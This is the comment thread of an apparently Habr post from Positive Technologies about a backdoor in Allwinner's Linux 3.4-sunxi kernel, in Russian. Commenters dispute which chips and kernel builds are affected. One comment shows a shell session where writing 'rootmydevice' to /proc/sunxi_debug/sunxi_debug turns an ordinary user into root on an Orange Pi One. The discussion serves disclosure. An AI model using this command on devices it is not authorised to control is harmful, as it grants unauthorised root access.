ptsecurity 17 мая 2016 в 12:15

Бэкдор в Linux-ядре китайского производителя ARM открывает доступ к смартфону одной командой

2 мин

29K

Блог компании Positive TechnologiesИнформационная безопасность*

+11

Комментарии 6

RZK333 17 мая 2016 в 14:11

Эксперты Positive Technologies рекомендуют по возможности не использовать устройства, работающие под управлением ОС на базе версии ядра Linux 3.4-sunxi от Allwinner до выяснения всех деталей произошедшего.

пожалуйста, по возможности, не рекомендуйте то, в чем не разбираетесь.

Проблема существует в ведре которое поставлялось OEM-ам имплементирующим девайсы на A83T, H3 и H8. На всех остальных девайсах этой проблемы нет. В частности на народных A10/A13/A20 и например здесь https://github.com/cubieboard/CC-A80-kernel-source/tree/master/arch/arm/mach-sunxi тоже нет. Вы даже умудрились поставить фотографию планшета на A13 заглавной, буд-то бы на нем есть такая уязвимость.

еще раз, на всякий случай:
есть несколько версий ядер, устанавливаемых на устройства:
1) OEM от Allwinner, разных версий. для A10-A20 было одно, для A31/33 было другое. Со временем, Allwinner выпустил свои новые SoC и именно в этой версии есть этот злополучный драйвер.
2) ядро от сообщества linux-sunxi.org
3) Ванильное ядро

rstepanov 17 мая 2016 в 21:29

Не надо так категорично писать, похоже, вы тоже не во всем разбираетесь.

roman@orangepione:~$ cat /proc/sunxi_debug/sunxi_debug
roman@orangepione:~$ id
uid=1000(roman) gid=1000(roman) groups=1000(roman)
roman@orangepione:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
roman@orangepione:~$ id
uid=0(root) gid=0(root) groups=0(root),1000(roman)
roman@orangepione:~$ uname -a
Linux orangepione 3.4.110-sun8i #18 SMP PREEMPT Tue Mar 8 20:03:32 CET 2016 armv7l GNU/Linux
roman@orangepione:~$ cat /etc/deb
debconf.conf    debian_version
roman@orangepione:~$ cat /etc/debian_version
8.4

Это Armbian на Orange Pi One (Allwinner H3), нормальных ядер для этой платформы по состоянию где-то месяц назад не было, сейчас не в курсе.

RZK333 17 мая 2016 в 22:25

у вас ядро от вашего OEM, которому дал Allwinner его. в статье написано общее «не юзайте linux-3.4-sunxi» (которых минимум три разных версий разных годов для разных поколений SoC-ов).

rstepanov 17 мая 2016 в 23:12

В статье перечислены SoC, которых коснулась проблема. И таки да, если детально разбираться в каком патчсете есть проблема, а в каком нет — тут гораздо больше трех разных версий будет :) В Armbian уже поправили, в остальных — надо разбираться.

НЛО прилетело и опубликовало эту надпись здесь

tvi 19 мая 2016 в 19:21

«Уязвимость» была известна уже недели 2 точно (натыкался на неё). Почему Вы на неё обратили внимание только сейчас?) К тому же эта «уязвимость» создавалась для рутования.

Зарегистрируйтесь на Хабре, чтобы оставить комментарий